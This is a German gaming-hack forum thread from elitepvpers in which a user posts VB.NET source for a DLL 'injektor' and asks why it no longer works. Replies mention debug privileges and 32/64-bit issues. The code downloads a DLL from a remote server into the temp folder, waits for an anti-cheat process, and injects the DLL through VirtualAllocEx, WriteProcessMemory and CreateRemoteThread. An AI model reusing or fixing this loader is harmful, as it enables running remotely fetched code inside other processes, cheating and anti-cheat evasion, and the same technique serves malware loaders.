Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > General Coding
You last visited: Today at 00:54

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Injektor nicht mehr Akktuell ?

Discussion on Injektor nicht mehr Akktuell ? within the General Coding forum part of the Coders Den category.

Reply
 
Old   #1

 
-=-Killha-=-'s Avatar
 
elite*gold: 747
Join Date: Dec 2010
Posts: 1,212
Received Thanks: 207
Injektor nicht mehr Akktuell ?

Habe hier noch mein injektor und ne frage ob der noch geht .

Ich habe getestet und öffnet sicht kein hack, öffne ich es mit ein anderen geht es.

Mein code :

Code:
Imports System.Net
Imports System.Environment

Public Class injektor1


    Friend WithEvents MyWebClient As New Net.WebClient

    'Private Sub Net.WebClient_DownloadProgressChanged(ByVal sender As Object, ByVal e As System.Net.DownloadProgressChangedEventArgs) Handles MyWebClient.DownloadProgressChanged
    'Form2.ProgressBar1.Value = e.ProgressPercentage
    'End Sub


    Private TargetProcessHandle As Integer
    Private pfnStartAddr As Integer
    Private pszLibFileRemote As String
    Private TargetBufferSize As Integer

    Public Const PROCESS_VM_READ = &H10
    Public Const TH32CS_SNAPPROCESS = &H2
    Public Const MEM_COMMIT = 4096
    Public Const PAGE_READWRITE = 4
    Public Const PROCESS_CREATE_THREAD = (&H2)
    Public Const PROCESS_VM_OPERATION = (&H8)
    Public Const PROCESS_VM_WRITE = (&H20)

    Public Declare Function ReadProcessMemory Lib "kernel32" ( _
    ByVal hProcess As Integer, _
    ByVal lpBaseAddress As Integer, _
    ByVal lpBuffer As String, _
    ByVal nSize As Integer, _
    ByRef lpNumberOfBytesWritten As Integer) As Integer

    Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" ( _
    ByVal lpLibFileName As String) As Integer

    Public Declare Function VirtualAllocEx Lib "kernel32" ( _
    ByVal hProcess As Integer, _
    ByVal lpAddress As Integer, _
    ByVal dwSize As Integer, _
    ByVal flAllocationType As Integer, _
    ByVal flProtect As Integer) As Integer

    Public Declare Function WriteProcessMemory Lib "kernel32" ( _
    ByVal hProcess As Integer, _
    ByVal lpBaseAddress As Integer, _
    ByVal lpBuffer As String, _
    ByVal nSize As Integer, _
    ByRef lpNumberOfBytesWritten As Integer) As Integer

    Public Declare Function GetProcAddress Lib "kernel32" ( _
    ByVal hModule As Integer, ByVal lpProcName As String) As Integer

    Private Declare Function GetModuleHandle Lib "Kernel32" Alias "GetModuleHandleA" ( _
    ByVal lpModuleName As String) As Integer

    Public Declare Function CreateRemoteThread Lib "kernel32" ( _
    ByVal hProcess As Integer, _
    ByVal lpThreadAttributes As Integer, _
    ByVal dwStackSize As Integer, _
    ByVal lpStartAddress As Integer, _
    ByVal lpParameter As Integer, _
    ByVal dwCreationFlags As Integer, _
    ByRef lpThreadId As Integer) As Integer

    Public Declare Function OpenProcess Lib "kernel32" ( _
    ByVal dwDesiredAccess As Integer, _
    ByVal bInheritHandle As Integer, _
    ByVal dwProcessId As Integer) As Integer

    Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _
    ByVal lpClassName As String, _
    ByVal lpWindowName As String) As Integer

    Private Declare Function CloseHandle Lib "kernel32" Alias "CloseHandleA" ( _
    ByVal hObject As Integer) As Integer


    Dim ExeName As String = IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath)

    Private Sub Inject()

        Timer1.Stop()
        Dim TargetProcess As Process() = Process.GetProcessesByName(TextBox2.Text)
        TargetProcessHandle = OpenProcess(PROCESS_CREATE_THREAD Or PROCESS_VM_OPERATION Or PROCESS_VM_WRITE, False, TargetProcess(0).Id)
        pszLibFileRemote = System.IO.Path.GetTempPath() & TextBox3.Text
        pfnStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
        TargetBufferSize = 1 + Len(pszLibFileRemote)
        Dim Rtn As Integer
        Dim LoadLibParamAdr As Integer
        LoadLibParamAdr = VirtualAllocEx(TargetProcessHandle, 0, TargetBufferSize, MEM_COMMIT, PAGE_READWRITE)
        Rtn = WriteProcessMemory(TargetProcessHandle, LoadLibParamAdr, pszLibFileRemote, TargetBufferSize, 0)
        CreateRemoteThread(TargetProcessHandle, 0, 0, pfnStartAddr, LoadLibParamAdr, 0, 0)

        If Form2.CheckBox1.Checked = True Then
            Form2.Close()
        End If
        If Form2.CheckBox1.Checked = False Then

        End If
    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        If IO.File.Exists(System.IO.Path.GetTempPath() & TextBox3.Text) Then
            Dim TargetProcess As Process() = Process.GetProcessesByName("HSUpdate")
            If TargetProcess.Length = 0 Then
                Form2.Label22.Text = ("Waiting For" & " " & TextBox2.Text)
            Else
                Timer1.Stop()
                Form2.Label22.Text = "Inject succes now running"
                Call Inject()
            End If
        Else
            Form2.Label22.Text = "Error"
        End If
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load



        TextBox1.Text = New Net.WebClient().DownloadString("http://8***/client/link1.txt")
        TextBox2.Text = New Net.WebClient().DownloadString("http://***47.81/client/prozess1.txt")
        TextBox3.Text = New Net.WebClient().DownloadString("http://8***81/client/dll1.txt")


        Dim dateiPfad As String = My.Computer.FileSystem.SpecialDirectories.Temp & "/" & TextBox3.Text
        Dim internetPfad As String = TextBox1.Text
        Dim client As New System.Net.WebClient
        client.DownloadFile(internetPfad, dateiPfad)



        'Dim fileinfo As System.IO.FileInfo = My.Computer.FileSystem.GetFileInfo("c:\" & TextBox3.Text)
        'fileinfo.Attributes = fileinfo.Attributes Or IO.FileAttributes.Hidden

        Timer1.Interval = 50
        Timer1.Start()
    End Sub

End Class
wo liegt der fehler?
-=-Killha-=- is offline  
Old 09/08/2011, 19:24   #2
 
.SkyneT.'s Avatar
 
elite*gold: 273
Join Date: Sep 2010
Posts: 1,831
Received Thanks: 786
Quote:
Public Declare Function OpenProcess Lib "kernel32" ( _
ByVal dwDesiredAccess As Integer, _
ByVal bInheritHandle As Integer, _
ByVal dwProcessId As Integer) As Integer
Du kannst das hier kompilieren ?!
Sollte das nicht so aussehen:

Quote:
Public Declare Function OpenProcess Lib "kernel32" ( _
ByVal dwDesiredAccess As Integer,
ByVal bInheritHandle As Integer,
ByVal dwProcessId As Integer) As Integer
.SkyneT. is offline  
Old 09/09/2011, 11:31   #3

 
-=-Killha-=-'s Avatar
 
elite*gold: 747
Join Date: Dec 2010
Posts: 1,212
Received Thanks: 207
damit hatt es nix zu tun das normal, funktioniert hat es dalezt noch nur nun nicht mehr iwo habe ich ein fehler .
-=-Killha-=- is offline  
Old 09/10/2011, 15:40   #4

 
-=-Killha-=-'s Avatar
 
elite*gold: 747
Join Date: Dec 2010
Posts: 1,212
Received Thanks: 207
weis keiner die lösung ? ob der noch geht weils bei mir nich geht ...
-=-Killha-=- is offline  
Old 09/13/2011, 12:00   #5

 
-=-Killha-=-'s Avatar
 
elite*gold: 747
Join Date: Dec 2010
Posts: 1,212
Received Thanks: 207
warum geht es nicht obwohl da steht injected ?
-=-Killha-=- is offline  
Old 09/14/2011, 15:33   #6
 
XxharCs's Avatar
 
elite*gold: 34
Join Date: Apr 2011
Posts: 1,475
Received Thanks: 1,227
Dir fehlen* die Debug Rechte. Und so wie ich das sehe ist das ein schlechter AutoInject source für vb ausm Internet^^
XxharCs is offline  
Old 09/14/2011, 16:55   #7

 
-=-Killha-=-'s Avatar
 
elite*gold: 747
Join Date: Dec 2010
Posts: 1,212
Received Thanks: 207
naja unter 32bit geht es auser 64bit
-=-Killha-=- is offline  
Reply


Similar Threads Similar Threads
kann client nicht mehr mit Tastatur steuern wieso nicht?
05/12/2011 - Metin2 Private Server - 1 Replies
hey epvp jetzt ein großes prob. ich kann mein clienten nicht mehr mit der tastatur steurn sondern nurnoch mit mausklicks:( es tat die ganze zeit so lange ich metin 2 spiele....auf einmal öffne ich mein client neu und schwuppps ging nix mehr:( hoffe mir kan einer helfen.. mfg
Crossfire: Mehr Buggy geht nicht... echt nicht
12/29/2010 - CrossFire - 8 Replies
Hallo :D hatte grade ärgsten CF Bug ever. Also zuerst konnte ich mich einloggen, dann ging ich auf nen Server da hab ich dann Disconnect bekommen. Dann beim 2ten mal auch Disconnect. Und beim 3ten mal Hack tool detected(hacke aber nich). Dann hab ich es mal in nen Room geschafft. War S&D(Blackwindow). Aber als der Ladebildschirm kam, war Disconnect from Server. Aber mir wars egal und hab nix gedrückt aus fun, jedoch war ich dann ingame. Aber für alle anderen war ich nicht da. :D Dann ahb ich...
char erstellen nicht mehr möglich und löchen auch nicht .. was tun ?
10/28/2010 - Flyff Private Server - 1 Replies
Also wie der Titel schon sagt kann ich keinen chrackter löchen und seid neuem auch keine mehr erstellen ... die namen exestieren bereits und wenn ich es dann doch mal schaffe akzeptiert er mein bank pw nicht als richtig ^^... was soll icht un ? kann mir bitte jemand helfen ?
NPC´s gehen nicht mehr auf und Pferd kommt nicht mehr
01/05/2010 - Metin2 Private Server - 2 Replies
Hallo Community, ich hab n Problem. Auf unserm Server gehen seit ein paar Stunden die NPC´s wie Lager, Marktplatzwächter... nicht mehr auf. Außerdem ist es nicht mehr möglich sein Pferd zu rufen. Teleporter und fertigkeiten wählen geht auch nicht mehr. Wisst ihr woran dieser Fehler liegt und wie man ihn beheben kann? BITTE WIR BRAUCHEN HILFE!!!!!:(
Injektor funtz net mehr
07/28/2009 - S4 League - 13 Replies
Also ich wollte mit den injektor + bypass spielen hatt auch geklappt bis zur helfte eines spieles ungefähr. Da kommt bei mir so ne hack meldung. Ist das nur bei mir so oder auch bei anderen???



All times are GMT +2. The time now is 00:54.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.